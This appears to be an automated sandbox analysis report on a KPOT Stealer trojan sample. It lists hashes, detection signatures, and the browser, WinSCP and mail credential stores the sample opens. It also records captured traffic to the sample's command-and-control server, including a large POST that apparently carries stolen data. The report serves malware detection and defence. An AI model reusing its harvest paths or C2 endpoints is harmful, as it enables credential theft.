Analysis Report SecuriteInfo.com.Trojan.GenericKD.36362611.3113.2129

Overview

General Information

Sample Name: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.2129 (renamed file extension from 2129 to exe)
Analysis ID: 356849
MD5: 9dc97eaed4e61901afc327ce9f122262
SHA1: 41881d3463f4246d4d0146faf39703354bab83e9
SHA256: 4412624d06991fa64f684fcc6d66c787d040eaa12356885cf0a0919c732c82a3
Tags: KPOTStealer

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Machine Learning detection for sample
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Enables debug privileges
HTTP GET or POST without a user agent
Is looking for software installed on the system
JA3 SSL client fingerprint seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Tries to load missing DLLs
Uses 32bit PE files
Yara signature match

Classification

AV Detection:

Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Virustotal: Detection: 66%
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Metadefender: Detection: 18%
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe ReversingLabs: Detection: 79%
Machine Learning detection for sample
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Uses new MSVCR Dlls
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Uses secure TLS version for HTTPS connections
Source: unknown HTTPS traffic detected: 88.80.20.20:443 -> 192.168.2.6:49718 version: TLS 1.2
Source: unknown HTTPS traffic detected: 88.80.20.20:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 88.80.21.20:443 -> 192.168.2.6:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 88.80.21.20:443 -> 192.168.2.6:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 194.54.82.12:443 -> 192.168.2.6:49734 version: TLS 1.2
Source: unknown HTTPS traffic detected: 194.54.82.12:443 -> 192.168.2.6:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 190.115.26.106:443 -> 192.168.2.6:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 190.115.26.106:443 -> 192.168.2.6:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 62.75.198.178:443 -> 192.168.2.6:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 62.75.198.178:443 -> 192.168.2.6:49751 version: TLS 1.2
Source: unknown HTTPS traffic detected: 88.80.20.20:443 -> 192.168.2.6:49754 version: TLS 1.2
Source: unknown HTTPS traffic detected: 194.54.82.13:443 -> 192.168.2.6:49768 version: TLS 1.2
Source: unknown HTTPS traffic detected: 88.80.20.20:443 -> 192.168.2.6:49769 version: TLS 1.2
Source: unknown HTTPS traffic detected: 88.80.20.20:443 -> 192.168.2.6:49777 version: TLS 1.2
Source: unknown HTTPS traffic detected: 194.54.82.12:443 -> 192.168.2.6:49779 version: TLS 1.2
Source: unknown HTTPS traffic detected: 144.76.12.6:443 -> 192.168.2.6:49781 version: TLS 1.2

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2029837 ET TROJAN KPOT Stealer Initial CnC Activity M4 192.168.2.6:49785 -> 47.91.94.99:80
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /r/kpotuvorot10.bit HTTP/1.1 Host: bdns.by Content-Length: 0
Source: global traffic HTTP traffic detected: GET /r/kpotuvorot10.bit HTTP/1.1 Host: bdns.co Content-Length: 0
Source: global traffic HTTP traffic detected: GET /r/kpotuvorot10.bit HTTP/1.1 Host: bdns.im Content-Length: 0
Source: global traffic HTTP traffic detected: GET /r/kpotuvorot10.bit HTTP/1.1 Host: bdns.io Content-Length: 0
Source: global traffic HTTP traffic detected: GET /r/kpotuvorot10.bit HTTP/1.1 Host: bdns.link Content-Length: 0
Source: global traffic HTTP traffic detected: GET /r/kpotuvorot10.bit HTTP/1.1 Host: bdns.nu Content-Length: 0
Source: global traffic HTTP traffic detected: GET /r/kpotuvorot10.bit HTTP/1.1 Host: bdns.pro Content-Length: 0
Source: global traffic HTTP traffic detected: GET /bgczXibj92HSlSCK HTTP/1.1 Connection: Keep-Alive Host: 47.91.94.99
Source: global traffic HTTP traffic detected: GET /bgczXibj92HSlSCK HTTP/1.1 Connection: Keep-Alive Host: 47.91.94.99
Source: global traffic HTTP traffic detected: GET /bgczXibj92HSlSCK HTTP/1.1 Host: 47.91.94.99 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /bgczXibj92HSlSCK HTTP/1.1 Host: 47.91.94.99 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /bgczXibj92HSlSCK HTTP/1.1 Connection: Keep-Alive Host: dolboeb1701.com
Source: global traffic HTTP traffic detected: GET /bgczXibj92HSlSCK/ HTTP/1.1 Connection: Keep-Alive Host: dolboeb1701.com
Source: global traffic HTTP traffic detected: GET /bgczXibj92HSlSCK/login.php HTTP/1.1 Connection: Keep-Alive Host: dolboeb1701.com Cookie: PHPSESSID=f84qhg8e3t915dmhm2crp648n2
Source: global traffic HTTP traffic detected: GET /bgczXibj92HSlSCK/util.php?id=53E61D202B0F807656615 HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: dolboeb1701.com Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /bgczXibj92HSlSCK/util.php HTTP/1.1 Content-Type: application/octet-stream Content-Encoding: binary Host: dolboeb1701.com Content-Length: 860177 Connection: Keep-Alive Cache-Control: no-cache
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

System Summary:

Tries to load missing DLLs
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Section loaded: msxml3.dll Jump to behavior
Uses 32bit PE files
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Yara signature match
Source: 00000001.00000003.337105580.0000000002BF0000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 1.3.SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe.2bf0000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 1.3.SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe.2bf0000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: classification engine Classification label: mal72.spyw.winEXE@1/1@25/8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Mutant created: \Sessions\1\BaseNamedObjects\53E61D202B0F807656615
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Virustotal: Detection: 66%
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Metadefender: Detection: 18%
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe ReversingLabs: Detection: 79%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

Is looking for software installed on the system
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Registry key enumerated: More than 171 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

Enables debug privileges
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Process token adjusted: Debug Jump to behavior

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies Jump to behavior
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail Jump to behavior

Contacted Public IPs

IP | Domain | Country | ASN | ASN Name | Malicious
88.80.20.20 | unknown | Sweden | 33837 | PRQ-AS________________________SE | false
190.115.26.106 | unknown | Belize | 262254 | DDOS-GUARDCORPBZ | false
62.75.198.178 | unknown | Germany | 8972 | GD-EMEA-DC-SXB1DE | false
88.80.21.20 | unknown | Sweden | 33837 | PRQ-AS________________________SE | false
144.76.12.6 | unknown | Germany | 24940 | HETZNER-ASDE | false
194.54.82.13 | unknown | Ukraine | 41018 | OMNILANCEhttpomnilancecomUA | false
194.54.82.12 | unknown | Ukraine | 41018 | OMNILANCEhttpomnilancecomUA | false
47.91.94.99 | unknown | United States | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | true

Contacted Domains

Name | IP | Active
bdns.im | 194.54.82.12 | true
bdns.by | 88.80.20.20 | true
bdns.nu | 88.80.20.20 | true
bdns.pro | 194.54.82.12 | true
bdns.io | 190.115.26.106 | true
bdns.co | 88.80.21.20 | true
dotbit.me | 144.76.12.6 | true
dolboeb1701.com | 47.91.94.99 | true
bdns.link | 62.75.198.178 | true

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
https://bdns.link/r/kpotuvorot10.bit | false | Avira URL Cloud: safe | unknown
http://dolboeb1701.com/bgczXibj92HSlSCK/login.php | true | Avira URL Cloud: safe | unknown
http://dolboeb1701.com/bgczXibj92HSlSCK/util.php | true | Avira URL Cloud: safe | unknown
https://bdns.pro/r/kpotuvorot10.bit | false | Avira URL Cloud: safe | unknown
http://dolboeb1701.com/bgczXibj92HSlSCK/util.php?id=53E61D202B0F807656615 | true | Avira URL Cloud: safe | unknown
http://dolboeb1701.com/bgczXibj92HSlSCK/ | true | Avira URL Cloud: safe | unknown
https://bdns.im/r/kpotuvorot10.bit | false | Avira URL Cloud: safe | unknown
https://bdns.by/r/kpotuvorot10.bit | false | Avira URL Cloud: safe | unknown
https://bdns.co/r/kpotuvorot10.bit | false | Avira URL Cloud: safe | unknown
http://dolboeb1701.com/bgczXibj92HSlSCK | true | Avira URL Cloud: safe | unknown
https://bdns.nu/r/kpotuvorot10.bit | false | Avira URL Cloud: safe | unknown
http://47.91.94.99/bgczXibj92HSlSCK | true | Avira URL Cloud: safe | unknown
https://bdns.io/r/kpotuvorot10.bit | false | Avira URL Cloud: safe | unknown